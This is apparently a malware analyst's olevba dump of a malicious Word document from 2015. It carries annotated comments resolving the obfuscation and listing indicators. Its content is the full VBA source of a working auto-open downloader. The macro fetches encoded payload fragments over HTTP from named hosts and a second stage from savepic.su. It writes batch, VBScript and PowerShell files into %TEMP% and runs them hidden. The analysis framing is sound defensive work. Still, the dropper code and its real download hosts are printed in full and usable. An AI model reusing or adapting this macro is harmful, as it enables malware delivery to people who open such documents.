dynamoo

Malicious Word macro

Jul 21st, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS-HB- edcsrp~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: edcsrp~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: edcsrp~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16.  Sub ZJhcjkhjwqhdjqw_Open()
      ' Empty stub: no statements in the body. Not referenced anywhere else in
      ' the listing; presumably padding to dilute the module.
  17.      
  18. End Sub
  19. Sub Huqwhdkqwhdjkqw_Open()
      ' Empty stub, same as ZJhcjkhjwqhdjqw_Open above: no body, no callers in
      ' the listing.
  20.      
  21. End Sub
  22. Sub Auto_Open()
      ' Auto-exec entry point (flagged by olevba as the Excel workbook-open
      ' trigger). Delegates to Zjdihquhwqid, which in turn runs the dropper
      ' routine Ynqhbdjhqwb.
  23.     Zjdihquhwqid
  24. End Sub
  25. Sub Zjdihquhwqid()
      ' Thin trampoline shared by AutoOpen and Auto_Open: the string assigned to
      ' HYQDUGWQ is never read (junk); the only real work is the call to the
      ' dropper routine Ynqhbdjhqwb.
  26.     HYQDUGWQ = "nj21he jg2hj21ge"
  27.     Ynqhbdjhqwb
  28. End Sub
  29. Sub Giqjwdhqwkjq()
      ' Assigns one junk string and returns. Not called from anywhere in the
      ' listing; dead filler.
  30.     BHBDJHWQ = "behj21ghj12"
  31. End Sub
  32. Sub AutoOpen()
      ' Auto-exec entry point for Word (runs when the document is opened; see
      ' the olevba ANALYSIS table). JAHSDJGHQW is junk; the call to Zjdihquhwqid
      ' leads to the dropper routine Ynqhbdjhqwb.
  33.     JAHSDJGHQW = "jr3 2jhjk2gr2"
  34.     Zjdihquhwqid
  35. End Sub
  36.  
  37. Sub Workbook_Open()
      ' Excel auto-exec entry point; LJKLJWDKLQ is junk. Chains into Auto_Open so
      ' the same dropper runs whichever Office host triggers the macro.
  38.     LJKLJWDKLQ = "bhjgwqhjdgqj "
  39.     Auto_Open
  40. End Sub
  41.  
  42. Sub Ynqhbdjhqwb()
      ' Dropper routine, reached from AutoOpen / Auto_Open via Zjdihquhwqid.
      ' Flow: build %TEMP% file names -> fetch a base64 configuration over HTTP
      ' -> decode it and pull tagged fragments out of it -> write .bat/.vbs
      ' (and on Vista+ a .ps1) into %TEMP% -> run the .bat hidden via Shell ->
      ' tidy the document body. Nearly every string is assembled from Chr()
      ' arithmetic; resolved values are noted inline for the reader.
      ' Many Dim'd names (fallout, silkroad, inclife, ...) are never used.
  43.  
  44.    
  45.     Dim fallout As Integer, silkroad As Integer, inclife As Integer, inredible As Integer
  46.     Dim retVal As Variant, gana As Integer, turkey As Integer, malay As Integer, SPAIN As String, BOLIVIA As String
      ' Chr(92) = "\" (path separator).
  47.     BOLIVIA = Chr(90 + 2)
  48.    
  49.    
      ' Random numeric string (see Ubqhwdhwqbd); becomes the stem of every
      ' dropped file name (FL2).
  50.     ANGOLA = Ubqhwdhwqbd(16137) + ""
      ' SPAIN = "Temp"; PH2 = Environ("Temp") & "\" through Module2.Goabc.
  51.     SPAIN = Chr(84) & "em" + "p"
  52.     QHDQUWH = ANGOLA
  53.     FL2 = QHDQUWH
  54.     PH2 = Module2.Goabc(SPAIN) + BOLIVIA
  55.    
  56.     silkroad = 9
  57.     jwnqdw = -1
  58.    
      ' First literal is dead; BALAGAN = 1 + 1 + 113 + Sgn(-1) = 114.
  59.     BOSNIA = 8719723
  60.     BOSNIA = 1 + 1 + 113 + Sgn(jwnqdw)
  61.     BALAGAN = BOSNIA
  62.    
  63.  
  64.     JWIDJIAAA = ""
      ' HUYFEA = "bat".
  65.     QIWJDABB = "b"
  66.     HUYFEA = QIWJDABB + "a" + "t"
      ' Chr(115) & Chr(49) = "s1", so PSFL = <stem> & ".ps1".
  67.     PSFL = FL2 + "" & "" + "." + "p" + "" + Chr(115) + Chr(49)
  68.    
      ' Sin(20 rad) is positive, so the argument is negative; the Integer
      ' parameter rounds it on the call and Sgn yields gana = -1.
  69.     gana = NUqwdqwbdsad(1 - 300 * Sin(20))
      ' Chr(114 + 2 - 1) = Chr(115) = "s".
  70.     SSS = Chr(BALAGAN + 2 + gana)
      ' Chr(46) = "."; VBFL = <stem> & ".vbs".
  71.     VBFL = FL2 + Chr(50 - 4) + "v" + "" + "" & "b" & "" & SSS & ""
      ' Sgn(Fix(-22.043)) = -1 -> Chr(-1 + 31 - 10 + 25 - 1 + 2) = Chr(46) = ".";
      ' BAFL = <stem> & ".bat".
  72.     BAFL = FL2 + Chr(NUqwdqwbdsad(Fix(-22.043)) + 31 - 10 + 25 + gana + 2) + HUYFEA
  73.    
      ' INTG = "object", AFTG = "module": the tag names Module3.India later
      ' searches for in the document body (Chr(110 + 1) = "o", Chr(109) = "m").
  74.     INTG = "" & "o" & "bject"
  75.     KIWD = Chr(110 + NUqwdqwbdsad(Len(BAFL))) + "dule"
  76.     AFTG = Chr(109) & KIWD
  77.    
      ' SXE = ".exe"; GNG = ".jpg" (Chr(46) = ".", Chr(101) = "e").
  78.     SXEE = Chr(46)
  79.     SXAA = Chr(101)
  80.     SXE = SXEE & SXAA & "" & "xe"
  81.     GNG = Chr(2 ^ 2 + 42) + "jpg"
  82.    
  83.    
  84.    
      ' HUQD = "/" (Chr(47)); ATTH = "http://"; BQHJDQ = "savepic.su/" - the
      ' host the second-stage URLs below are built on.
  85.     HUQD = Chr(30 + 16 + 1)
  86.     ATTH = "ht" & "t" & "" & "p" & ":" & "//"
  87.     BQHJDQ = "sa" + "vep" + "ic" & Chr(46) & "su" + HUQD
  88.      
      ' Full drop paths: %TEMP%\<stem>.ps1, .vbs and .bat. The literal first
      ' assigned to BAPTH is dead - it is overwritten with ABPTH two lines later.
  89.     PSPTH = PH2 + PSFL
  90.     VBPTH = PH2 + VBFL
  91.     BAPTH = "1jh2ekh12kehk12he j12g e21"
  92.     ABPTH = PH2 + BAFL
  93.     BAPTH = ABPTH
  94.     JHQKWDQAASS = BQHJDQ
  95.    
  96.     Dim BALAGANHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer, CONT As String
  97.    
      ' File numbers for the Open ... For Output As # statements further down.
  98.     DRT = 315
  99.     BFT = 316
  100.     CFT = 317
  101.     DFT = 318
  102.     EFT = 319
  103.     Dim NUWDHUQHUQWDH As String
      ' "USERPROFILE" (environment variable name used for the OS check below).
  104.     NUWDHUQHUQWDH = "" + "USE" & "RPROFILE"
  105.     Dim PBIn As String, asdwq As String, MIWDWQ As String
  106.    
  107.    
  108.    
      ' First-stage file names ("78672738612836.txt" = base64 configuration,
      ' "fafa.txt" = second download) and the two hosting paths; STT1 is tried
      ' first, STT2 is the fallback. These are the network IoCs of the sample.
  109.     TSTS = "." + "tx" + "t"
  110.     CDDD = "78672738612836" + TSTS
  111.     LNSS = "f" & "a" & "f" & "a" & "" + TSTS
  112.     STT1 = "phudge.ca/w" + "ordp" + "ress/w" + "p-con" + "tent/themes/can" + "vas/inc" + "ludes/.svn/props/"
  113.     STT2 = "kedros.ch/mod" + "ules/m" + "od_ara" + "ticlhess/"
  114.  
  115.  
      ' HTTP GET via MSXML2.ServerXMLHTTP (Module2.Linolium). There is no
      ' On Error handler anywhere in the listing, so a failed request raises
      ' and ends the macro here.
  116.     PBIn = ATTH + STT1 + CDDD
  117.     CONT = Module2.Linolium(PBIn)
  118.      
      ' Rasdas returns only the last character of the response.
  119.     asdwq = Rasdas(CONT)
  120.    
      ' Fall back to the second host when the first reply does not end in "="
      ' (i.e. does not look like padded base64); HQUWDAAA records which host
      ' answered so the second download below uses the same one.
      ' NOTE(review): when the first reply does end in "=", asdwq is still just
      ' that single character, so only "=" reaches the decoder - this looks
      ' like a bug in the sample rather than intended behaviour.
  121.     HQUWDAAA = "0"
  122.     If (asdwq <> "=") Then
  123.         PBIn = ATTH + STT2 + CDDD
  124.         CONT = Module2.Linolium(PBIn)
  125.         asdwq = CONT
  126.         HQUWDAAA = "1"
  127.     End If
  128.    
      ' Base64-decode through an MSXML DOM node (Quqhwdbyas).
  129.     CONT = Quqhwdbyas(asdwq)
  130.      
  131.     Dim ahuywdgqy As String
  132.      
      ' Extract the payload fragments from <text10>..</text10>, <stext1>..
      ' </stext1> etc. in the decoded configuration (Port); they are written
      ' verbatim into the dropped files below, so the actual script bodies are
      ' server-supplied and not present in this listing.
  133.     TVT10 = Port(CONT, "t" & "ext10")
  134.     TVT20 = Port(CONT, "t" & "ext20")
  135.     TVT21 = Port(CONT, "t" & "ext21")
  136.     TVT30 = Port(CONT, "t" & "ext30")
  137.     TVT31 = Port(CONT, "t" & "ext31")
  138.     XPT1 = Port(CONT, "stext1")
  139.     XPT2 = Port(CONT, "stext2")
  140.     XPT3 = Port(CONT, "stext3")
  141.    
  142.    
      ' OS check: does %USERPROFILE% contain "sers\" (C:\Users\... on Vista+)?
      ' hufehu1 is 0 for an XP-style "Documents and Settings" profile path.
  143.     WVR = Module2.Goabc(NUWDHUQHUQWDH)
  144.     hufehu1 = InStr(WVR, "sers\")
  145.    
  146.     Dim hudhw As Integer
  147.     Dim ghdAdd(1 To 3)
  148.     ghdAdd(1) = "1"
  149.     ghdAdd(2) = "0"
  150.     ghdAdd(3) = "0"
  151.    
  152.     If (hufehu1 <> 0) Then
  153.         ghdAdd(1) = "2"
  154.     Else
  155.         ghdAdd(2) = "3"
  156.     End If
  157.  
  158.  
      ' Join gives "2 0 0" or "1 3 0"; Val ignores the blanks, so hudhw is
      ' 200 (Users\ found) or 130 (not found). Those two values select the
      ' branches below.
  159.     JHWQUD = Join(ghdAdd)
  160.     hudhw = Val(JHWQUD)
  161.    
      ' One-second busy wait (Module2.Crispy).
  162.     Module2.Crispy (1)
  163.    
      ' Second download (fafa.txt) from the host that answered the first one.
  164.     MIWDWQ = ATTH + STT1 + LNSS
  165.     If (HQUWDAAA = "1") Then
  166.         MIWDWQ = ATTH + STT2 + LNSS
  167.     End If
  168.    
  169.     SEXX = Module2.Linolium(MIWDWQ)
  170.    
      ' Second-stage URLs http://savepic.su/5751812.jpg and .../5757956.jpg
      ' (image-named, but handed to the dropped scripts as $stat / statRT),
      ' and FF = "8.exe", the name used for the fetched executable. PSTB is unused.
  171.     PSTB = PBIn + "123123123"
  172.     MSTAR1 = JHQKWDQAASS + "5751812" + GNG
  173.     MSTAR2 = JHQKWDQAASS + "5757956" + GNG
  174.     STAR1 = ATTH + MSTAR1
  175.     STAR2 = ATTH + MSTAR2
  176.     FFQ = "8"
  177.     FF = FFQ + SXE
  178.    
      ' XP-style branch (hudhw = 130): write %TEMP%\<stem>.bat and <stem>.vbs
      ' from the fetched fragments plus a few variables (temp path, file stem,
      ' "8"), then run the .bat hidden through Module3.HowEver (Shell, style 0).
  179.      If (hudhw = 130) Then
  180.      Open BAPTH For Output As #DRT
  181.      Print #DRT, XPT1
  182.      Print #DRT, ":jadkjasghdjasg" & vbCrLf & "set trfd=" + Chr(34) + PH2 + Chr(34)
  183.      Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
  184.      Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
  185.      Print #DRT, XPT2
  186.      Close #DRT
  187.      
  188.      Module2.Crispy (1)
  189.      
  190.      Open VBPTH For Output As #BFT
  191.      Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
  192.      Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
  193.      Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
  194.      Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
  195.      Print #BFT, XPT3
  196.      Close #BFT
  197.      
      ' NOTE(review): BDDT is not defined anywhere in this listing (the other
      ' delay calls use Module2.Crispy). Without Option Explicit it is an empty
      ' Variant, so this member call should raise "Object required" and the
      ' Shell on the next line would not be reached in this branch.
  198.      BDDT.Crispy (1)
  199.      NTH1 = Module3.HowEver(retVal, BAPTH)
  200.      
  201.      End If
  202.      
  203.      
      ' HUDQG = "';" - closes the single-quoted PowerShell string literals below.
  204.      HUDQG = "';"
  205.      
  206.      
  207.      
      ' Vista+ branch (hudhw = 200): write %TEMP%\<stem>.ps1 (variables plus
      ' the <text10> fragment), <stem>.vbs (<text30>/<text31> fragments) and
      ' <stem>.bat (<text20>/<text21> fragments), then run the .bat hidden.
      ' Detection angle: WINWORD writing a .ps1/.vbs/.bat trio with one numeric
      ' stem into %TEMP% and then spawning a command interpreter.
  208.       If (hudhw = 200) Then
  209.        
  210.      ZPQSKD = FL2
  211.      Open PSPTH For Output As #CFT
  212.      Print #CFT, "$bhjdgqwdg = 'qbwdjhqbwgd';"
  213.      Print #CFT, "$bqhdwjqwdd = 'njqdhjqwdqj';"
  214.      Print #CFT, "$stat = 'ht'+'tp://'+''+'" + MSTAR2 + "';"
  215.      Print #CFT, "$ggtt = '" + SEXX + "';"
  216.      Print #CFT, "$pths = '" + PH2 + HUDQG
  217.      
  218.      Print #CFT, "$wehs = '" + ZPQSKD + HUDQG
  219.      Print #CFT, "$nnm = '" + FFQ + "';"
  220.      Print #CFT, TVT10
  221.      Close #CFT
  222.      
  223.      Open VBPTH For Output As #DFT
  224.      Print #DFT, TVT30
  225.      Print #DFT, "c" + "urrentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&huih"
  226.      Print #DFT, TVT31
  227.      Close #DFT
  228.    
      ' Chr(64) = "@", giving "@echo off" as the first batch line.
  229.      Open BAPTH For Output As #EFT
  230.      Print #EFT, Chr(30 + 30 + 4) + "echo off" & vbCrLf & ":jqduqihdjsakd"
  231.      Print #EFT, TVT20
  232.      Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
  233.      Print #EFT, ":hdjqkwhdqhwd"
  234.      Print #EFT, "set Mts4=" + Chr(34) + PH2 + Chr(34)
  235.      Print #EFT, ":ajhsdkasghjgsd"
  236.      Print #EFT, "set Rts4=" + "%Mts4%%Ads3%"
  237.      Print #EFT, TVT21
  238.      Close #EFT
  239.      Module2.Crispy (1)
  240.      
  241.      NTH2 = Module3.HowEver(retVal, BAPTH)
  242.      
  243.      End If
  244.      
      ' Document tidy-up via Module3.India: delete the text between <object>
      ' and </object> (c = 1), turn the text between <module> and </module>
      ' black (c = 2), then try to blank the four tags themselves (c = 3).
      ' Presumably the document body carries those marked-up regions; the
      ' document text itself is not part of this listing. The NTHn results are
      ' never read.
  245.     JUW = Chr(47)
  246.     AKK = Chr(60)
  247.     ZKK = ">"
  248.     NTH3 = Module3.India(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
  249.     NTH4 = Module3.India(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
  250.     NTH5 = Module3.India(AKK + INTG + ZKK, "", 3)
  251.     NTH6 = Module3.India(AKK + JUW + INTG + ZKK, "", 3)
  252.     NTH7 = Module3.India(AKK + AFTG + ZKK, "", 3)
  253.     NTH8 = Module3.India(AKK + JUW + AFTG + ZKK, "", 3)
  254.    
  255. End Sub
  256.  
  257.  
  258. Public Function NUqwdqwbdsad(a As Integer)
      ' Wrapper around Sgn: returns -1, 0 or 1 for the sign of a. Because the
      ' parameter is an Integer, fractional arguments (e.g. 1 - 300 * Sin(20))
      ' are rounded at the call site before the sign is taken.
  259. NUqwdqwbdsad = Sgn(a)
  260. End Function
  261.  
  262. Public Function Hhqudhqwgyuqwaaa(a As Integer)
      ' Duplicate of NUqwdqwbdsad: Sgn of an Integer argument. Used by
      ' Quqhwdbyas to turn Tan(12) (rounded to -1) into the -1 that selects
      ' the "M" of "MSXML2".
  263. Hhqudhqwgyuqwaaa = Sgn(a)
  264. End Function
  265.  
  266. Public Function Ubqhwdhwqbd(a As Integer)
      ' Returns a pseudo-random integer in [10000, 10000 + a) as a string; the
      ' caller passes 16137 and uses the result as the dropped-file name stem.
      ' No Randomize call appears in the listing, so the Rnd sequence is the
      ' VBA default for the session.
  267. Ubqhwdhwqbd = CStr(Int((a * Rnd) + 10000))
  268. End Function
  269.  
  270.  
  271. Public Function Quqhwdbyas(ByVal strData As String) As String
      ' Base64 decoder built on MSXML: an element whose DataType is
      ' "bin.base64" is given the encoded text, and nodeTypedValue yields the
      ' decoded bytes, which are then assigned to the String return value.
      ' Called on the first-stage configuration in Ynqhbdjhqwb.
  272.     Dim objXML As Object
  273.     Dim objNode As Object
  274.     Dim asduiwhqdqiw As Integer, nudqwd As Integer, sshquwdq As Integer
      ' Tan(12) is roughly -0.64; stored into an Integer it rounds to -1, so
      ' Sgn gives -1 and Chr(78 - 1) = "M": QHDHUQW = "MSXML2.DOMDocument".
  275.     nudqwd = Tan(12)
  276.     'MsgBox ("tangens:" + nudqwd)
  277.    asduiwhqdqiw = Hhqudhqwgyuqwaaa(nudqwd)
  278.     QHDHUQW = "" & Chr(78 + asduiwhqdqiw) + "SXML2.DOMDocument"
  279.     Set objXML = CreateObject(QHDHUQW)
      ' Element name "b64"; the name plays no part in the decoding.
  280.     Set objNode = objXML.createElement("b6" + "4")
      ' Four junk assignments, never read.
  281.     objNodeS = "j1h2 ehgj12hj12 ejg12e1"
  282.     objNodeE = "g21eh1"
  283.     objNodeQ = "1j2ge h12"
  284.     objNodeZ = "dbjsahs "
      ' DataType resolves to "bin.base64" (Chr(97) = "a").
  285.     objNode.DataType = "bin.b" + Chr(97) + "se" + "6" & "4"
  286.     objNode.Text = strData
  287.     WUDHA = objNode.nodeTypedValue
  288.     Quqhwdbyas = WUDHA
  289.     Set objNode = Nothing
  290.     Set objXML = Nothing
  291. End Function
  292.  
  293. Public Function Port(a, b As String)
      ' Returns the text enclosed between "<b>" and "</b>" in a (a is an
      ' untyped Variant). Used on the decoded configuration to pull out the
      ' <text10>/<stext1>... fragments that are written into the dropped files.
      ' Note VBA types each name separately: only tent is an Integer here,
      ' krd is a Variant.
  294. Dim krd, tent As Integer
      ' Chr(60) = "<", Chr(62) = ">".
  295. UQWD = Chr(50 + 8 + 2) & ""
  296. NDUW = "" & Chr(70 - 8)
      ' +8 is the length of the opening tag only for the 6-character names the
      ' caller uses ("<text10>", "<stext1>"). If a tag is absent InStr yields 0,
      ' so Mid$ gets a wrong start or a negative length (run-time error).
  297. krd = InStr(1, a, UQWD + b + NDUW) + 8
  298. tent = InStr(1, a, UQWD + "/" + b + NDUW) - krd
  299. KLMN = Mid$(a, krd, tent)
  300. HUQHWDA = KLMN
  301. Port = HUQHWDA
  302. End Function
  303.  
  304.  
  305.  
  306. Private Static Function Rasdas(a As String)
      ' Returns the last character of a. Ynqhbdjhqwb uses it to test whether
      ' the first HTTP reply ends in "=" before deciding on the fallback host.
  307. Rasdas = Right(a, 1)
  308. End Function
  309.  
  310.  
  311.  
  312.  
  313.  
  314.  
  315. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  316. ANALYSIS:
  317. +------------+----------------+-----------------------------------------+
  318. | Type       | Keyword        | Description                             |
  319. +------------+----------------+-----------------------------------------+
  320. | AutoExec   | AutoOpen       | Runs when the Word document is opened   |
  321. | AutoExec   | Auto_Open      | Runs when the Excel Workbook is opened  |
  322. | AutoExec   | Workbook_Open  | Runs when the Excel Workbook is opened  |
  323. | Suspicious | CreateObject   | May create an OLE object                |
  324. | Suspicious | Open           | May open a file                         |
  325. | Suspicious | Output         | May write to a file (if combined with   |
  326. |            |                | Open)                                   |
  327. | Suspicious | Print #        | May write to a file (if combined with   |
  328. |            |                | Open)                                   |
  329. | Suspicious | Chr            | May attempt to obfuscate specific       |
  330. |            |                | strings                                 |
  331. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  332. |            |                | be used to obfuscate strings (option    |
  333. |            |                | --decode to see all)                    |
  334. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  335. |            |                | may be used to obfuscate strings        |
  336. |            |                | (option --decode to see all)            |
  337. +------------+----------------+-----------------------------------------+
  338. -------------------------------------------------------------------------------
  339. VBA MACRO Module1.bas
  340. in file: edcsrp~1.doc - OLE stream: u'Macros/VBA/Module1'
  341. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  342. Public Function Xjdkhjfwefw(a As Object)
      ' Returns a.responseText - the body of the completed request object that
      ' Module2.Linolium passes in. Split into its own module so the string
      ' "responseText" does not appear next to the CreateObject call.
  343. Xjdkhjfwefw = (a.responseText)
  344. End Function
  345.  
  346.  
  347. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  348. ANALYSIS:
  349. No suspicious keyword or IOC found.
  350. -------------------------------------------------------------------------------
  351. VBA MACRO Module2.bas
  352. in file: edcsrp~1.doc - OLE stream: u'Macros/VBA/Module2'
  353. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  354.  
  355. Public Function Goabc(sps As String)
      ' Environ lookup wrapper: returns the value of environment variable sps.
      ' Called with "Temp" (drop directory) and "USERPROFILE" (OS check).
      ' The three identical NJBHVGASVD assignments are junk.
  356. NJBHVGASVD = "h1j2 hjeg1hj12geh 1221ek l12j12e"
  357. NJBHVGASVD = "h1j2 hjeg1hj12geh 1221ek l12j12e"
  358. NJBHVGASVD = "h1j2 hjeg1hj12geh 1221ek l12j12e"
  359. Goabc = Environ(sps)
  360. End Function
  361. Public Function Linolium(nbqjbdjqw As String)
      ' HTTP GET of the URL in nbqjbdjqw; returns the response body through
      ' Module1.Xjdkhjfwefw (responseText). Every download in ThisDocument goes
      ' through here, so outbound HTTP from the Office process via the
      ' ServerXMLHTTP object is the network behaviour to look for.
  362. Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, Kjqiwdhqwuhdjqkwhdjkqwbd As Object, AHUDWQI As String
  363. Dim ashdUHhda As String, hausd As Integer
  364. ashdUHhda = nbqjbdjqw
      ' Tan(12) rounds to -1 in the Integer, so Chr(93 - 5) = "X" and
      ' Chr(85 - 1) = "T": the ProgID is "MSXML2.ServerXMLHTTP".
  365. hausd = Tan(12)
  366. BQDHJQWDGWQJGS = "MS" + Chr(93 + 5 * hausd) + "ML2.ServerXMLH" & Chr(85 + hausd) & Chr(84) & Chr(80)
  367. 'MsgBox (BQDHJQWDGWQJGS)
  368. Set Kjqiwdhqwuhdjqkwhdjkqwbd = CreateObject(BQDHJQWDGWQJGS)
      ' Open "GET" with the async argument omitted (synchronous); AHUDWQI is
      ' never assigned, so Send transmits an empty body. No On Error handler,
      ' so a failed request raises to the caller and ends the macro.
  369. Kjqiwdhqwuhdjqkwhdjkqwbd.Open "GE" & "" & "T", ashdUHhda
  370. Kjqiwdhqwuhdjqkwhdjkqwbd.Send (AHUDWQI)
  371. Linolium = Module1.Xjdkhjfwefw(Kjqiwdhqwuhdjqkwhdjkqwbd)
  372. End Function
  373. Sub Crispy(NumOfSeconds As Long)
      ' Busy-wait delay: spins on DoEvents until Timer passes the target.
      ' Ynqhbdjhqwb calls it with 1 between writing the dropped files and
      ' running them. Timer counts seconds since midnight, so a wait that
      ' spans midnight ends early.
  374. Dim SngSec As Long
  375. SngSec = Timer + NumOfSeconds
  376. Do While Timer < SngSec
  377. DoEvents
  378. Loop
  379. End Sub
  380.  
  381.  
  382.  
  383.  
  384.  
  385. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  386. ANALYSIS:
  387. +------------+--------------+-----------------------------------------+
  388. | Type       | Keyword      | Description                             |
  389. +------------+--------------+-----------------------------------------+
  390. | Suspicious | CreateObject | May create an OLE object                |
  391. | Suspicious | Open         | May open a file                         |
  392. | Suspicious | Environ      | May read system environment variables   |
  393. | Suspicious | Chr          | May attempt to obfuscate specific       |
  394. |            |              | strings                                 |
  395. +------------+--------------+-----------------------------------------+
  396. -------------------------------------------------------------------------------
  397. VBA MACRO Module3.bas
  398. in file: edcsrp~1.doc - OLE stream: u'Macros/VBA/Module3'
  399. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  400.  
  401. Public Function India(dnuwhd As String, b As String, c As Integer)
      ' Edits the active document between an opening marker (dnuwhd) and a
      ' closing marker (b): c = 1 deletes the enclosed range, c = 2 sets its
      ' font colour to black, c = 3 is meant to replace the marker text with a
      ' space. Called from ThisDocument.Ynqhbdjhqwb with "<object>"/"</object>"
      ' and "<module>"/"</module>". India is never assigned, so the function
      ' returns Empty; callers ignore the result. The BYHQGDJHWQ assignments
      ' and commented-out copies are junk.
  402. Dim selectedText As String
  403. Dim ssjidoqwhduqhwidqwudihq As Range, lesleslesqjhdjqkwhdwq As Range
      ' First range = whole document; find the opening marker and collapse to
      ' its end so the second range can start right after it.
  404. Set ssjidoqwhduqhwidqwudihq = ActiveDocument.Range
  405. BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
  406. BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
  407. With ssjidoqwhduqhwidqwudihq.Find
  408. 'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
  409. 'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
  410. .Text = dnuwhd
  411. .MatchWholeWord = True
  412. ssjidoqwhduqhwidqwudihq.Find.Execute
  413. ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseEnd
  414. Dim wdwq As String
  415. Set lesleslesqjhdjqkwhdwq = ActiveDocument.Range
  416. Dim wdsadwq As String
  417. lesleslesqjhdjqkwhdwq.Start = ssjidoqwhduqhwidqwudihq.End
      ' Now find the closing marker from that position and collapse to its
      ' start; the second range then spans exactly the enclosed text.
  418. .Text = b
  419. .MatchWholeWord = True
  420. .Execute
  421. BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
  422. BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
  423. ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseStart
  424. lesleslesqjhdjqkwhdwq.End = ssjidoqwhduqhwidqwudihq.Start
  425.  
      ' Range.Delete returns a Long; it is stored in a String and never read.
  426. If (c = 1) Then
  427.     selectedText = lesleslesqjhdjqkwhdwq.Delete
  428. End If
  429. If (c = 2) Then
  430.     lesleslesqjhdjqkwhdwq.Font.Color = wdColorBlack
  431. End If
  432.  
      ' 1 - 2 ^ 4 = -15, Sgn = -1, so QHUDW = Chr(32) = " " (the replacement).
  433. Dim hduwaa As Integer
  434. hduwaa = 1 - 2 ^ 4
  435.  
  436. QHUDW = Chr(10 + 23 + Sgn(hduwaa))
  437.  
      ' NOTE(review): .Text = a uses a name that is neither a parameter of
      ' India (the marker is dnuwhd) nor declared anywhere in the listing, so
      ' with Option Explicit off the find text here is empty and the tag
      ' replacement most likely does not happen as intended.
  438. If (c = 3) Then
  439.     With ssjidoqwhduqhwidqwudihq.Find
  440.     .Text = a
  441.     .Replacement.Text = QHUDW
  442.     'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
  443.    'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
  444.    'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
  445.    'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
  446.    .Wrap = wdFindContinue
  447.     .Execute Replace:=wdReplaceAll
  448.     End With
  449. End If
  450.  
  451. End With
  452. End Function
  453.  
  454. Public Function HowEver(hqwdugqw As Variant, hasdgja)
      ' Executes hasdgja (the dropped %TEMP%\<stem>.bat path) through Shell
      ' with window style 0 (hidden) and returns Shell's task ID. hqwdugqw is
      ' ByRef by default, so the caller's retVal is overwritten as well.
      ' BHQJGDWQ is junk. This is the process-creation step of the dropper:
      ' the Office process spawning a command interpreter from %TEMP%.
  455. BHQJGDWQ = "1b2hej g1h2e21j"
  456. hqwdugqw = Shell(hasdgja, 0)
  457. HowEver = hqwdugqw
  458. End Function
  459.  
  460.  
  461.  
  462.  
  463.  
  464.  
  465.  
  466.  
  467.  
  468.  
  469.  
  470.  
  471.  
  472.  
  473.  
  474.  
  475.  
  476. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  477. ANALYSIS:
  478. +------------+---------+-----------------------------------------+
  479. | Type       | Keyword | Description                             |
  480. +------------+---------+-----------------------------------------+
  481. | Suspicious | Shell   | May run an executable file or a system  |
  482. |            |         | command                                 |
  483. | Suspicious | Chr     | May attempt to obfuscate specific       |
  484. |            |         | strings                                 |
  485. +------------+---------+-----------------------------------------+